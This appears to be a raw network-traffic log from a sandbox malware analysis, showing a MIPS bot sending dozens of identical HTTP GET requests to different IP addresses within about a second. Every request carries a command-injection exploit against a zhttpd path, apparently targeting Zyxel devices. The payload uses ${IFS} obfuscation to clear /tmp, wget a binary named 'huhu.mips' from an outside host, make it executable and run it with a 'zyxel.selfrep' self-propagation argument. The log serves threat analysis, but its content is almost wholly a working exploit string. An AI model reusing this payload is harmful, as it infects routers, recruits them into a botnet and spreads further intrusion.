                                                        Feb 2, 2024 06:20:59.728035927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2027192.168.2.144911650.39.202.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728072882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2028192.168.2.1440470177.208.95.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728105068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2029192.168.2.1451704162.210.236.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728127956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2030192.168.2.143429453.112.116.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728184938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2031192.168.2.145882062.215.208.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728234053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2032192.168.2.144990254.187.117.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728555918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2033192.168.2.146000499.94.188.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.728924036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2034192.168.2.144281249.221.71.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.729089975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2035192.168.2.14334788.92.59.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.729335070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2036192.168.2.146054620.8.247.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.732566118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2037192.168.2.1453382179.103.41.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.732997894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2038192.168.2.1449526180.198.41.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.733022928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2039192.168.2.1447432163.36.125.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.733108044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2040192.168.2.1434846186.111.228.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.733136892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2041192.168.2.145406086.58.89.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.733174086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2042192.168.2.144468682.44.113.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.733222961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2043192.168.2.144768834.143.121.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.733257055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2044192.168.2.1450538135.197.154.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741364956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2045192.168.2.1433862212.72.250.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741390944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2046192.168.2.1446350169.102.227.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741444111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2047192.168.2.1438422180.17.64.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741477966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2048192.168.2.1437914183.162.45.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741529942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2049192.168.2.1433244169.245.211.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741556883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2050192.168.2.14334204.212.85.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741592884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2051192.168.2.145808679.101.65.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741632938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2052192.168.2.1448026167.153.233.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741681099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2053192.168.2.1453938206.33.143.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741722107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2054192.168.2.1442016149.53.143.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741740942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2055192.168.2.1451780184.40.110.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741780043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2056192.168.2.144937680.11.156.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741831064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2057192.168.2.144790294.26.45.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741869926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2058192.168.2.143628280.149.74.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741909027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2059192.168.2.1448228109.182.234.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.741970062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2060192.168.2.1434928118.42.81.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742014885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2061192.168.2.1444298207.96.5.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742050886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2062192.168.2.1446746216.176.180.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742075920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2063192.168.2.143556036.42.248.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742120028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2064192.168.2.143449849.198.228.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742176056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2065192.168.2.1458830114.187.156.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742214918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2066192.168.2.1433776114.99.74.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742245913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2067192.168.2.1455900145.71.58.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742304087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2068192.168.2.1449530118.22.139.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742347002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2069192.168.2.1438848120.14.100.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742377043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2070192.168.2.143613859.144.103.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742408037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2071192.168.2.143682235.90.1.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742455959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2072192.168.2.145049867.0.154.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742491007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2073192.168.2.145847239.141.214.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742532015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2074192.168.2.1451380199.93.187.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742584944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2075192.168.2.144910450.220.196.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742614031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2076192.168.2.145969613.220.249.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742671967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2077192.168.2.143421881.170.254.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742692947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2078192.168.2.1454152151.203.209.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742742062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2079192.168.2.14398124.221.251.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742788076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2080192.168.2.1455016176.187.195.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742839098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2081192.168.2.1454174145.30.195.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742872953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2082192.168.2.1459158173.158.172.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742903948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2083192.168.2.145862843.244.122.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742952108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2084192.168.2.1442104197.65.63.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.742985010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2085192.168.2.1446142153.68.65.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743045092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2086192.168.2.1452034170.188.202.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743077993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2087192.168.2.1444280155.250.38.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743108034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2088192.168.2.144470640.152.236.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.743151903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2089192.168.2.1449842109.33.195.245443
                                                        TimestampBytes transferredDirectionData
